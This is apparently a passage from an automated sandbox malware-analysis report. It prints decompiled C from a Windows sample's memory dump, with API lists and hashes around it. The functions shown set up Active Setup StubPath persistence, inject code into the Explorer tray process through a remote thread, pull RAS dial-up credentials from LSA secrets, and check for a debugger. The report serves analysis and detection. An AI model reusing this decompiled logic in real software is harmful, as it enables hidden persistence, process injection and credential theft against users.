                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004068B4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t43;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t62;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t43 = __ecx;
				_push(_t62);
				_push(0x40698a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62;
				E00401CAC( &_v16, __edx);
				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0);
				E00401CAC( &_v20, _t43);
				_t26 = E00401D50(_v20);
				_t27 =  *0x40d090; // 0x0
				_t28 = E00401D50(_t27);
				E00401CAC( &_v24, _t43);
				_t53 =  *0x40d090; // 0x0
				E00401D58( &_v24, _t53);
				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28);
				RegCloseKey(_v8);
				_pop(_t54);
				 *[fs:eax] = _t54;
				_push(E00406991);
				return E00401AE4( &_v24, 4);
			}















                                    0x004068b7
                                    0x004068b9
                                    0x004068bb
                                    0x004068bd
                                    0x004068bf
                                    0x004068c3
                                    0x004068c9
                                    0x004068ca
                                    0x004068cf
                                    0x004068d2
                                    0x004068ea
                                    0x004068fa
                                    0x0040690d
                                    0x00406917
                                    0x0040691f
                                    0x00406926
                                    0x0040692b
                                    0x00406938
                                    0x00406940
                                    0x00406946
                                    0x00406961
                                    0x0040696a
                                    0x00406971
                                    0x00406974
                                    0x00406977
                                    0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407CAC, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				union _SID_NAME_USE _v24;
				void* _v28;
				void _v284;
				char _v540;
				void* _t50;
				intOrPtr _t56;
				void* _t60;

				_v8 = 0;
				_t50 = __eax;
				_push(_t60);
				_push(0x407d81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffde8;
				E00401AC0(__eax);
				E00402074( &_v8, 0x100);
				_v12 = 0xff;
				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
					_v16 = 0xff;
					_v20 = 0xff;
					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
						_push( &_v28);
						_push( &_v284);
						L00407B54();
						E00401CAC(_t50, _v28);
						GlobalFree(_v28);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00407D88);
				return E00401AC0( &_v8);
			}














                                    0x00407cb8
                                    0x00407cbb
                                    0x00407cbf
                                    0x00407cc0
                                    0x00407cc5
                                    0x00407cc8
                                    0x00407ccd
                                    0x00407cda
                                    0x00407cdf
                                    0x00407cfa
                                    0x00407cfc
                                    0x00407d03
                                    0x00407d36
                                    0x00407d4b
                                    0x00407d52
                                    0x00407d53
                                    0x00407d5d
                                    0x00407d66
                                    0x00407d66
                                    0x00407d36
                                    0x00407d6d
                                    0x00407d70
                                    0x00407d73
                                    0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AFB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t49;
				void* _t55;

				_v20 = 0;
				_v16 = 0;
				_push(_t55);
				_push(0x40b062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff0;
				E004013A4(0,  &_v16);
				_t52 = E00401F48(_v16);
				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
				_t37 = OpenProcess(0x1f0fff, 0, _v8);
				E00401CAC( &_v20, _t17);
				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0040B069);
				return E00401AE4( &_v20, 2);
			}









                                    0x0040afba
                                    0x0040afbd
                                    0x0040afc2
                                    0x0040afc3
                                    0x0040afc8
                                    0x0040afcb
                                    0x0040afd3
                                    0x0040afe0
                                    0x0040aff3
                                    0x0040b008
                                    0x0040b00f
                                    0x0040b027
                                    0x0040b042
                                    0x0040b049
                                    0x0040b04c
                                    0x0040b04f
                                    0x0040b061

                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407E40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short* _v8;
				intOrPtr _v12;
				char _v16;
				void* _t23;
				intOrPtr _t50;
				intOrPtr _t58;
				void* _t59;

				_t59 = __eflags;
				_t55 = __esi;
				_t54 = __edi;
				_t41 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t58);
				_push(0x407ef8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58;
				_push("RasDialParams!");
				E00407CAC( &_v16, __ebx, __ecx);
				_push(_v16);
				_push(0x407f24);
				E00401E10();
				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
				_t60 = _t23;
				if(_t23 != 0) {
					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
					_push(_v8[2]);
					L00407B74();
				}
				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
					_push(_v8[2]);
					L00407B74();
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(E00407EFF);
				return E00401AE4( &_v16, 2);
			}










                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e43
                                    0x00407e45
                                    0x00407e47
                                    0x00407e4b
                                    0x00407e4c
                                    0x00407e51
                                    0x00407e54
                                    0x00407e57
                                    0x00407e5f
                                    0x00407e64
                                    0x00407e67
                                    0x00407e74
                                    0x00407e84
                                    0x00407e89
                                    0x00407e8b
                                    0x00407e99
                                    0x00407ea4
                                    0x00407ea5
                                    0x00407ea5
                                    0x00407ebe
                                    0x00407ecc
                                    0x00407ed7
                                    0x00407ed8
                                    0x00407ed8
                                    0x00407edf
                                    0x00407ee2
                                    0x00407ee5
                                    0x00407ef7

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405AD8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t6;
				void* _t8;
				void* _t14;
				void* _t15;

				_t14 = __ecx;
				_t15 = __edx;
				_t8 = __eax;
				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
			}







                                    0x00405ade
                                    0x00405ae0
                                    0x00405ae2
                                    0x00405af4
                                    0x00405b0e

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040562C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E0040562C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}







                                    0x00405630
                                    0x0040563c
                                    0x00405640
                                    0x0040564d
                                    0x0040564f
                                    0x00405653
                                    0x00405657
                                    0x00405657
                                    0x00405653
                                    0x0040565f

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004069E4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
				void* _v8;
				char* _t7;
				void** _t11;

				_t7 = __edx;
				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11);
				RegDeleteKeyA(_v8, _t7);
				return RegCloseKey(_v8);
			}






                                    0x004069e6
                                    0x004069fa
                                    0x00406a05
                                    0x00406a15

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e62
                                    0x00405e64
                                    0x00405e76
                                    0x00405e81

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E18, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e1a
                                    0x00405e1c
                                    0x00405e2e
                                    0x00405e39

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24070950, Relevance: 6.2, APIs: 4, Instructions: 205librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 24070A9A
                                    • GetProcAddress.KERNEL32(?,2406BFF9), ref: 24070AAF
                                    • VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
                                    • VirtualProtect.KERNEL32(24010000,00001000), ref: 24070B23
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.545446545.0000000024054000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000005.00000002.545435094.0000000024010000.00000002.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.545510337.0000000024071000.00000004.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    • Opcode ID: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction ID: fea73935ac89edb1ecb1ad068de3a124fb3e9058189b3824ae919782244a9029
                                    • Opcode Fuzzy Hash: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction Fuzzy Hash: AB512972A553525AE3118A78CCC0E95BBF0EB42234F180778C6E5C73C7E7A459858B6B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004058E0, Relevance: 6.0, APIs: 4, Instructions: 25windowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
				long _t7;
